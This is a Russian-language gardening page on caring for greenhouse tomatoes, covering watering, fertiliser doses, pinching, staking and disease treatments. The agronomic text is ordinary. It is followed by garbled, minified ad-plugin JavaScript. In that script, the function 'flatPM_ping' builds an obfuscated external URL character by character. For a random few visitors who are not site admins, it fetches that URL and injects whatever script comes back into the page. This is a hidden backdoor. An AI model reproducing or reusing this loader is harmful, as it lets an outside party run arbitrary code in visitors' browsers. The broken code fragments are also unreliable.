
Последующий уход за томатами

Поливают помидоры только по потребности, утром или вечером, когда меньше солнца. Используют воду комнатной температуры.

В жару поливать необходимо 2-3 раза в неделю. Для проверки почвы на влажность землю сжимают в кулаке. Если она не рассыпается, а держит форму, поливать растения еще нет необходимости.

Подкормки

Если кусты не удобрять, есть большая вероятность, что плоды будут не достаточно развиваться и от этого может пострадать урожай.

В почве должны быть 3 минеральных вещества, которые влияют на рост и плодоношение: азот, калий и фосфор.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Для нормального роста растениям и, в том числе томату, нужно 23 минеральных элемента. Азот, фосфор и калий потребляется в больших количествах растениями. Поэтому они называются макроэлементами, но помимо них почва должна содержать микроэлементы: железо, магний, кальций, серу, бор и т.п.

Удобрять томаты следует 3-4 раза в сезон:

  • через 10-15 дней после помещения в теплицы;
  • перед цветением культуры;
  • до начала плодоношения и после, чтобы продлить его.

Используют по очереди минеральные и органические подкормки.

Популярные минеральные удобрения: Карбамид (1,5 ст. л. разводят в 10 л воды), Суперфосфат (в 1 л горячей воды размешивают 1 ст. л. удобрения, а потом доливают еще 9 л холодной воды).

Подойдут Плантафол (способствует укреплению иммунитета растения), Террафлекс-С (для лучшего плодоношения), Мастер.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Эти удобрения лучше всего использовать для фертигации — внесении в растворенном виде с капельным поливом.

К органическим удобрениям относят раствор перегноя (1 л на 8 л воды) или куриного помета (1 л на 10 л воды).

Пасынкование

Кусты обязательно пасынкуют, иначе они будут слишком густые и все полезные вещества будут расходоваться на листья и стебли.

В идеале – оставляют 2 основных стебля, кисти удаляют через одну.

Подвязка

Кусты начинают подвязывать на специальные шпалеры или колья, когда они достигнут более 50 см, иначе они будут ломаться под тяжестью плодов.

Иногда, при созревании томатов и набора ими основной массы, под кисти ставят подпорки.

Борьба с болезнями и вредителями

Согласно характеристике, поразить сорт могут споры грибов и бактерии, развитие которых возникают от неправильного ухода (избыток влаги, мало света и. т. д.).

  1. Фитофтора. Бурые и желтоватые пятна по поверхности листвы вызваны грибком. Если не принимать меры, растение усыхает. Для профилактики кусты обрабатывают 1% бордосской жидкостью (10 г на 10 л воды, каждых 4-5 дней), можно использовать 10% раствор поваренной соли.
  2. Кладоспориоз. Коричневые выпученные разводы на томатах и листьях, что приводит к гибели растения. Для лечения подходят препараты Оксихом (10 г на 5 л воды), Фундазол (5 г на 10 л воды).
  3. Вершинная гниль. Признак болезни — бурые водянистые пятна на помидорах, из-за чего они начинают портиться. Поможет опрыскивание хлористым кальцием (0,4%) или бордоской жидкостью.
  4. Макроспориоз. Поражает куст полностью и за короткое время он гибнет. В борьбе с болезнью используют смесь из меди и мыла (20 г медного купороса 200 г хозяйственного мыла разводят в 10 л воды и полностью опрыскивают кусты).

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
×
×